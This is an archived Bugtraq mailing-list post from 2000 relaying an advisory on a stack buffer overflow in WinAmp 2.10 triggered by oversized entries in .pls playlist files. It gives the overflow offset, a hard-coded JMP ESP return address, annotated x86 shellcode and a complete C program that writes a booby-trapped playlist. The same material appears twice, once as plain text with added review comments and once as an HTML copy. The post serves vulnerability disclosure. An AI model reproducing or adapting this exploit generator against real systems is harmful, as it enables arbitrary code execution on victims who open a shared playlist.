[13297] in bugtraq
Buffer overflow with WinAmp 2.10
daemon@ATHENA.MIT.EDU (Transfer Interrupted)
Mon Jan 10 19:39:29 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="_=XFMail.1.4.0.Linux:000109112131:762=_"
Message-Id: <XFMail.000109112131.t-i@gmx.net>
Date: Sun, 9 Jan 2000 11:21:31 +0100
Reply-To: t-i@gmx.net
From: Transfer Interrupted <t-i@GMX.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format
--_=XFMail.1.4.0.Linux:000109112131:762=_
Content-Type: text/plain; charset=us-ascii
Hi!
There's a stack-based buffer overflow in WinAmp 2.10 (Win 98) which allows a user to
execute arbitrary code. Here's the source code and a more detailed introduction!
Be careful,
Transfer Interrupted
--
"This vulnerability is completely theoretical!"
-Microsoft
--_=XFMail.1.4.0.Linux:000109112131:762=_
Content-Disposition: attachment; filename="winamp.win98.txt"
Content-Transfer-Encoding: 7bit
Content-Description: winamp.win98.txt
Content-Type: text/plain;
charset=us-ascii; name=winamp.win98.txt; SizeOnDisk=13229
Author: Steve Fewer, darkplan@oceanfree.net
http://indigo.ie/~lmf
Introduction:
I recently uncovered a stack-based buffer overflow in winamp
version 2.10 which lets me execute 'arbitrary code'. It is
carried out through .pls files which winamp uses for playlists.
This is unnerving as it is a feasible plan to trade playlists on
irc during an mp3 trading session with someone.
The overflow occurs when an entry greater than 580 bytes is
read in from a .pls file. EIP is the only register overwritten,
by the four bytes that follow; from there on there is space for
your shell code, e.g.
[playlist]
File1=<580 bytes><eip><shell code>
NumberOfEntries=1
The first 580 bytes get mangled around in memory, but the 585th
byte (where our shell code starts) is pointed to by ESP;
therefore a simple 'JMP ESP' or the like will land us back in
our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in
comctl32.dll, which winamp loads. Pointing our EIP at that
address lands us back where we want to be.
This was all created/tested on Windows 98 [Version 4.10.1998]
running on an Intel PII400 with 128MB RAM.
The Shell Code:
The shell code I wrote for this simply displays a message box
and then calls exit(). However, Winamp doesn't load msvcrt.dll,
which is needed to call exit(), so we have to load it ourselves.
I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for
LoadLibraryA(). For calling MessageBox I used the address
0xBFF5412E in user32.dll (v4.10.1998), and for calling exit() I
used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It
didn't warrant using GetProcAddress for compatibility's sake.
For the OP codes see the exploit further on.
// Shell code as described in the text above: LoadLibraryA("MSVCRT.DLL"), then
// MessageBox, then exit(0). 32-bit x86, Intel syntax; Win32 arguments are
// pushed right-to-left. All three call targets are absolute addresses taken
// from specific DLL builds (kernel32/user32 v4.10.1998, msvcrt v6.00.8397.0,
// see above); on any other build they point elsewhere and the code faults.
// None of the three frames is ever torn down (no pop ebp / ret): the process
// ends inside exit(). The byte encoding of these instructions is the
// 'sploit' string in the C program further on.
// This loads msvcrt.dll
// Three pushes of 0 reserve 12 zeroed bytes at [ebp-0Ch]..[ebp-01h]; the ten
// ASCII bytes stored below spell "MSVCRT.DLL" and the two untouched zero
// bytes at [ebp-02h],[ebp-01h] terminate the string.
push ebp
mov ebp,esp
xor eax,eax                   // eax = 0
push eax                      // [ebp-04h] = 0
push eax                      // [ebp-08h] = 0
push eax                      // [ebp-0Ch] = 0
mov byte ptr[ebp-0Ch],4Dh     // 'M'
mov byte ptr[ebp-0Bh],53h     // 'S'
mov byte ptr[ebp-0Ah],56h     // 'V'
mov byte ptr[ebp-09h],43h     // 'C'
mov byte ptr[ebp-08h],52h     // 'R'
mov byte ptr[ebp-07h],54h     // 'T'
mov byte ptr[ebp-06h],2Eh     // '.'
mov byte ptr[ebp-05h],44h     // 'D'
mov byte ptr[ebp-04h],4Ch     // 'L'
mov byte ptr[ebp-03h],4Ch     // 'L'  ([ebp-02h],[ebp-01h] stay 0 = NUL terminator)
mov edx,0xBFF776D4            // LoadLibraryA in kernel32.dll v4.10.1998 (hard-coded)
push edx                      // [ebp-10h] = function address
lea eax,[ebp-0Ch]             // eax = &"MSVCRT.DLL"
push eax                      // argument: lpLibFileName
call dword ptr[ebp-10h]       // LoadLibraryA("MSVCRT.DLL"); its return value (eax) is not used
// This calls MessageBox to say 'Hi!'
// A new frame is built on top of the previous one; one push of 0 reserves
// four zeroed bytes at [ebp-04h]..[ebp-01h] for the string "Hi!".
// No LoadLibrary is done for user32.dll here.
push ebp
mov ebp,esp
xor edi,edi                   // edi = 0, reused for every zero argument below
push edi                      // [ebp-04h] = 0
mov byte ptr[ebp-04h],48h     // 'H'
mov byte ptr[ebp-03h],69h     // 'i'
mov byte ptr[ebp-02h],21h     // '!'  ([ebp-01h] stays 0 = NUL terminator)
mov edx, 0xBFF5412E           // MessageBox in user32.dll v4.10.1998 (hard-coded)
push edx                      // [ebp-08h] = function address
push edi                      // uType     = 0
lea edx,[ebp-04h]             // edx = &"Hi!"
push edx                      // lpCaption = "Hi!"
push edx                      // lpText    = "Hi!"
push edi                      // hWnd      = NULL
call dword ptr[ebp-08h]       // MessageBox(NULL, "Hi!", "Hi!", 0)
// This calls exit()
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFAAFB            // edx = 0x78005504, exit() in msvcrt.dll v6.00.8397.0 (see above);
                              // presumably computed this way so the encoded immediate holds no 0x00 byte
push edx                      // [ebp-04h] = function address
xor eax,eax                   // eax = 0
push eax                      // argument: status = 0
call dword ptr[ebp-04h]       // exit(0); does not return
The Exploit:
<-snip->
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
*/
#include <stdio.h>
/* Generator for the proof-of-concept playlist described above.
 *
 * Writes "crAsh.pls" in the current directory with the layout
 *   [playlist]\n
 *   File1=<580 x 0x90><4-byte eip><sploit>\n
 *   NumberOfEntries=1
 * where 'eip' is the comctl32.dll 'JMP ESP' address from the advisory text
 * (0xBFB9CFF7, stored little-endian) and 'sploit' is the byte encoding of the
 * assembly listed above. Returns 0; takes no arguments.
 *
 * NOTE(review): the archived listing is quoted-printable mangled -- every
 * "=3D" is a literal '=' and a trailing '=' on a line is a soft line break
 * (no character). As archived it does not compile until decoded.
 * NOTE(review): declarations after statements and "for(int x...)" need a
 * C99 (or C++) compiler.
 */
int main()
{
printf("\n\n\t\t.......................................\n");
printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
printf("\t\t.......................................\n");
printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
printf("\t\t.........http://indigo.ie/~lmf.........\n");
printf("\t\t.......................................\n\n");
/* Only the first 580 bytes are ever written (loop below); buffer[580] and
 * onward are left uninitialised and no NUL is stored, so the "%s" that
 * prints it reads past the 580 NOPs until it happens to hit a zero byte. */
char buffer[640];
/* Four initialiser bytes; the remaining elements are zero-filled by C, so
 * "%s" emits exactly the 4-byte little-endian address 0xBFB9CFF7. */
char eip[8] =3D "\xF7\xCF\xB9\xBF";
/* Machine code for the assembly listed above (\x55\x8B\xEC = push ebp /
 * mov ebp,esp, ...). The listed bytes contain no \x00, so "%s" emits all of
 * them; the array's unused tail is zero-filled. */
char sploit[256] =3D =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\=
xFA\x2E\xC6
\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\=
x45\xF4\x50
\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\=
x45\xFE\x21
\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\=
xEC\xBA\xFF
\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
/* 580-byte NOP (0x90) sled: the length the advisory gives before EIP is
 * reached. */
for(int x=3D0;x<580;x++)
{
buffer[x] =3D 0x90;
}
/* NOTE(review): fopen() result is not checked; on failure every fprintf()
 * and the fclose() below are called with a NULL FILE*. Opened in binary
 * mode so the 0x90/shell-code bytes are written unchanged. */
file =3D fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=3D");
fprintf(file, "%s", buffer);    /* NOP sled (see note on buffer above) */
fprintf(file, "%s", eip);       /* 4-byte return address */
fprintf(file, "%s", sploit);    /* shell code bytes */
fprintf(file, "\nNumberOfEntries=3D1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
<-snip->
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
------=_NextPart_000_0029_01BF56CF.4A7BA760
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Nullsoft Winamp 2.10 buffer overflow=20
advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20
Steve Fewer, <A=20
href=3D"mailto:darkplan@oceanfree.net">darkplan@oceanfree.net</A><BR>&nbs=
p;  =
; =20
<A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR>-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Introduction:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>I recently uncovered a stack based =
buffer overflow=20
in winamp<BR>version 2.10 which lets me execute 'arbitrary code'. It is=20
<BR>carried out through .pls files which winamp uses for playlists. =
<BR>This is=20
unnerving as it is a feasible plan to trade playlists on<BR>irc during a =
mp3=20
trading session with someone.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The overflow occurs when an entry =
greater than 580=20
bytes is <BR>read in from a .pls file. The EIP is the only register =
overwritten=20
<BR>in the next four bytes that follow, from there on is space for =
<BR>your=20
shell code. eg.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>[playlist]<BR>File1=3D<580=20
bytes><eip><shell code><BR>NumberOfEntries=3D1 =
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The first 580 bytes get mangled around =
in memory=20
but the 585 <BR>byte (where our shell code starts) is pointed to by the =
ESP,=20
<BR>therefore a simple 'JMP ESP' or the like will land us back in =
<BR>our shell=20
code. I used a 'JMP ESP' at address 0xBFB9CFF7 in <BR>comctl32.dll which =
winamp=20
loads. Pointing our EIP into that <BR>address lands us back where we =
want to be.=20
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This was all created/tested on Windows =
98 [Version=20
4.10.1998]<BR>running on an Intel PII400 with 128MB RAM.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><BR>The Shell Code:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The shell code I wrote for this simply =
displays a=20
message box <BR>and then calls exit(). However Winamp doesn't load =
msvcrt.dll=20
<BR>which is needed to call exit() so we have to load it ourselves. =
<BR>I used=20
the address 0xBFF776D4 in kernel32.dll (v4.10.1998) =
for<BR>LoadLibraryA(). For=20
calling Messagebox I used the address <BR>0xBFF5412E in user32.dll =
(v4.10.1998)=20
and for calling exit() I <BR>used the address 0x78005504 in msvcrt.dll=20
(v6.00.8397.0). It <BR>didn't warrant using GetProcAddress for =
compatibilities=20
sake.<BR>For the OP codes see the exploit further on.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> // This loads=20
msvcrt.dll<BR> push ebp<BR> mov=20
ebp,esp<BR> xor eax,eax<BR> push=20
eax<BR> push eax<BR> push=20
eax<BR> mov byte =
ptr[ebp-0Ch],4Dh<BR> mov=20
byte ptr[ebp-0Bh],53h<BR> mov byte=20
ptr[ebp-0Ah],56h<BR> mov byte=20
ptr[ebp-09h],43h<BR> mov byte=20
ptr[ebp-08h],52h<BR> mov byte=20
ptr[ebp-07h],54h<BR> mov byte=20
ptr[ebp-06h],2Eh<BR> mov byte=20
ptr[ebp-05h],44h<BR> mov byte=20
ptr[ebp-04h],4Ch<BR> mov byte=20
ptr[ebp-03h],4Ch<BR> mov =
edx,0xBFF776D4<BR> =20
push edx<BR> lea eax,[ebp-0Ch]<BR> =
push=20
eax<BR> call dword ptr[ebp-10h]<BR> =
// This=20
calls MessageBox to say 'Hi!'<BR> push=20
ebp<BR> mov ebp,esp<BR> xor=20
edi,edi<BR> push edi<BR> mov byte=20
ptr[ebp-04h],48h<BR> mov byte=20
ptr[ebp-03h],69h<BR> mov byte=20
ptr[ebp-02h],21h<BR> mov edx, =
0xBFF5412E<BR> =20
push edx<BR> push edi<BR> lea=20
edx,[ebp-04h]<BR> push edx<BR> push=20
edx<BR> push edi<BR> call dword=20
ptr[ebp-08h]<BR> // This calls =
exit()<BR> =20
push ebp<BR> mov ebp,esp<BR> mov=20
edx,0xFFFFFFFF<BR> sub =
edx,0x87FFAAFB<BR> =20
push edx<BR> xor eax,eax<BR> push=20
eax<BR> call dword ptr[ebp-04h]</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The Exploit:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>/* Stack based buffer overflow exploit =
for Winamp=20
v2.10<BR> * Author Steve Fewer, 04-01-2k. Mail me at <A=20
href=3D"mailto:darkplan@oceanfree.net">darkplan@oceanfree.net</A><BR>&nbs=
p;*<BR> *=20
For a detailed description on the exploit see my =
advisory.<BR> *<BR> *=20
Tested with Winamp v2.10 using Windows98 on an Intel<BR> * PII 400 =
with=20
128MB RAM<BR> *<BR> * <A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR> */</FON=
T></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#include <stdio.h></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>int main()<BR>{</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> =20
printf("\n\n\t\t.......................................\n");<BR> &nb=
sp; =20
printf("\t\t......Nullsoft Winamp 2.10 =
exploit.....\n");<BR> =20
printf("\t\t.......................................\n");<BR> &=
nbsp;=20
printf("\t\t.....Author: Steve Fewer, =
04-01-2k.....\n");<BR> =20
printf("\t\t.........http://indigo.ie/~lmf.........\n");<BR> &=
nbsp;=20
printf("\t\t.......................................\n\n");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>char buffer[640];<BR>char eip[8] =3D=20
"\xF7\xCF\xB9\xBF";<BR>char sploit[256] =3D=20
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53<BR>\xC6=
\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\=
x2E\xC6<BR>\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x=
bF\x52\x8D\x45\xF4\x50<BR>\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF=
C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21<BR>\xBA\x2E\x41\xF5\xBF\x52\x57\x8D=
\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF<BR>\xFF\xFF\xFF\x81\=
xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>FILE *file;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> for(int=20
x=3D0;x<580;x++)<BR> {<BR> =
buffer[x] =3D=20
0x90;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>file =3D =
fopen("crAsh.pls","wb");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>fprintf(file, =
"[playlist]\n");<BR>fprintf(file,=20
"File1=3D");<BR>fprintf(file, "%s", buffer);<BR>fprintf(file, "%s",=20
eip);<BR>fprintf(file, "%s", sploit);<BR>fprintf(file,=20
"\nNumberOfEntries=3D1");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>fclose(file);<BR>printf("\t =20
created file crAsh.pls loaded with the exploit.\n");<BR>return=20
0;<BR>}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR></FONT></DIV></BO=
DY></HTML>
------=_NextPart_000_0029_01BF56CF.4A7BA760--
--_=XFMail.1.4.0.Linux:000109112131:762=_--
End of MIME message